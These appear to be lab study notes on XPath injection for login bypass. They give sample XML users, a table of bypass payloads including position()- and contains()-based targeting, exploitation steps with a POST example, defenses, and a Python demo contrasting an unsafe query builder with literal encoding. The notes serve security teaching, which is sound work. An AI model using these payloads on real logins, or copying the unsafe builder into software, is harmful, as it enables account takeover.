XPath Injection - Authentication Bypass

Key Concepts

  1. What is XPath?

    • XPath is a query language for selecting nodes from an XML document.

    • It is often used in web applications for data retrieval and authentication mechanisms.

  2. What is XPath Injection?

    • An attack technique where an attacker manipulates user input to alter the structure of an XPath query, bypassing authentication or gaining unauthorized access.


XPath Query Example

Consider the following XML user data:

<users>
  <user>
    <username>htb-stdnt</username>
    <password>Academy_student!</password>
  </user>
  <user>
    <username>admin</username>
    <password>admin</password>
  </user>
</users>

Authentication might use the following query:

/users/user[username/text()='USERNAME' and password/text()='PASSWORD']

If user input is unsanitized, injection becomes possible.


Common Payloads

  1. Universal True (Bypass Authentication):

    ' or '1'='1

    Resulting Query:

    /users/user[username/text()='' or '1'='1' and password/text()='']

  2. Target a Specific User (Admin):

    admin' or '1'='1

    Resulting Query:

    /users/user[username/text()='admin' or '1'='1' and password/text()='irrelevant']

  3. Position-Based Targeting:

    ' or position()=2 or '

    Resulting Query:

    /users/user[username/text()='' or position()=2 or '' and password/text()='irrelevant']

    • This targets the second user in the XML file (e.g., admin). Change the 2 to a 3 to pivot to a different account.

    • The trailing or '' absorbs the password clause: XPath evaluates and before or, so the predicate reads as ('' or position()=2) or ('' and password/text()='irrelevant'), and only position()=2 decides the match.

  4. Substring Matching:

    ' or contains(.,'admin') or '

    Resulting Query:

    /users/user[username/text()='' or contains(.,'admin') or '' and password/text()='irrelevant']

    • Searches for any user with "admin" in their username or other fields.


Steps to Exploit

  1. Analyze Application Behavior:

    • Understand how usernames and passwords are processed (e.g., via POST requests, cookies, etc.).

  2. Test for Injection Points:

    • Inject payloads into the username or password fields to observe server responses.

  3. Craft Payloads:

    • Use payloads like position() or contains() to refine your query targeting.

  4. Privilege Escalation:

    • Use payloads to access specific accounts or enumerate users until the desired privileges are obtained.


Practical Exploitation Example

Payload to Target Admin (Second User):

username=' or position()=2 or '&password=irrelevant

Response Example:

  • Successfully logged in as WELCOME SUPERUSER!.


Defense Measures

  1. Sanitize Inputs:

    • Use proper input validation and encoding to prevent injection.

    • Reject special characters like ', ", [, and ].

  2. Parameterized Queries:

    • Avoid dynamically building XPath queries. Use parameterized XPath APIs, where the XPath engine binds the variables and user input never becomes part of the query text:

      $query = '/users/user[username/text()=$username and password/text()=$password]';

    • Here $username and $password are XPath variable references resolved by the engine, not host-language interpolation. In PHP the query string must be single-quoted as above; in double quotes PHP would substitute the raw input into the query, which is exactly the vulnerable concatenation.
  3. Hash Passwords:

    • Ensure passwords are hashed before storage and comparison.

  4. Error Messages:

    • Avoid detailed error messages that reveal query structures.
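The following Python example is added here and is not code from the original notes. It shows, on one side, how the "Resulting Query" strings in the Common Payloads section come out of plain string concatenation, and on the other side the two defenses above that can be implemented without any particular XPath engine: the character filter from "Sanitize Inputs", and a string-literal encoder that makes user input inert when an API offers no variable binding. The encoder uses the standard XPath 1.0 idiom of splitting on quotes and re-joining with concat(), because XPath 1.0 literals have no escape sequences. All function names (build_query_unsafe, build_query_safe, xpath_literal, is_safe_input) are my own; engine-bound variables such as the $username form shown above remain the preferred option where the API supports them.

```python
# Added example (not part of the original notes). Demonstrates the query
# construction behind the notes' payloads and two engine-independent defenses.

# Query shape from the notes, with placeholders for the two literals.
QUERY_TEMPLATE = "/users/user[username/text()={u} and password/text()={p}]"


def build_query_unsafe(username: str, password: str) -> str:
    """Vulnerable builder: input is pasted between single quotes.

    A quote inside the input closes the literal and everything after it is
    parsed as XPath syntax. Because XPath evaluates 'and' before 'or', a
    payload ending in  or '  leaves the password clause attached to an empty
    (false) string, so the injected condition alone decides the match.
    """
    return QUERY_TEMPLATE.format(u=f"'{username}'", p=f"'{password}'")


# Characters the notes list as dangerous in an XPath context.
SPECIAL = set("'\"[]")


def is_safe_input(value: str) -> bool:
    """'Sanitize Inputs': reject any value carrying a quote or a bracket."""
    return not (SPECIAL & set(value))


def xpath_literal(value: str) -> str:
    """Encode an arbitrary string as an inert XPath 1.0 string literal.

    XPath 1.0 has no escape sequences, so:
      - no single quote in value  -> wrap in single quotes
      - no double quote in value  -> wrap in double quotes
      - both present              -> split on ' and rejoin with concat()
    """
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    pieces = []
    for i, part in enumerate(value.split("'")):
        if i:
            pieces.append("\"'\"")  # the single quote that split() consumed
        pieces.append(f"'{part}'")  # part contains no single quote
    return "concat(" + ", ".join(pieces) + ")"


def build_query_safe(username: str, password: str) -> str:
    """Hardened builder: both inputs become literals, never query syntax.

    The notes' payloads now compare against a username that literally
    contains  ' or '1'='1  and match no user. Prefer engine-bound XPath
    variables ($username) when the API offers them; this is the fallback.
    """
    return QUERY_TEMPLATE.format(u=xpath_literal(username),
                                 p=xpath_literal(password))


if __name__ == "__main__":
    # Constructed inputs taken from the notes' payload list.
    samples = [("' or '1'='1", ""), ("' or position()=2 or '", "irrelevant")]
    for u, p in samples:
        print("filter accepts :", is_safe_input(u))
        print("unsafe query   :", build_query_unsafe(u, p))
        print("safe query     :", build_query_safe(u, p))
```

Running the block prints, for each sample payload, whether the character filter would have accepted it and the query each builder produces; the unsafe output reproduces the Resulting Query lines from the notes character for character, while the safe output keeps the payload inside one quoted literal.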


Key Takeaways

  • XPath Injection is similar to SQL Injection but targets XML queries.

  • Functions like position() and contains() can help refine targeting in complex scenarios.

  • Proper sanitization and secure coding practices are essential to mitigate these attacks.


Payloads to Remember

  Scenario                            | Payload                        | Result
  ------------------------------------+--------------------------------+---------------------------------------
  Bypass Authentication               | ' or '1'='1                    | Logs in as the first user.
  Target Specific User (e.g., Admin)  | admin' or '1'='1               | Logs in as admin.
  Position-Based User Targeting       | ' or position()=2 or '         | Logs in as the second user.
  Substring Matching (Admin)          | ' or contains(.,'admin') or '  | Finds users with "admin" in username.
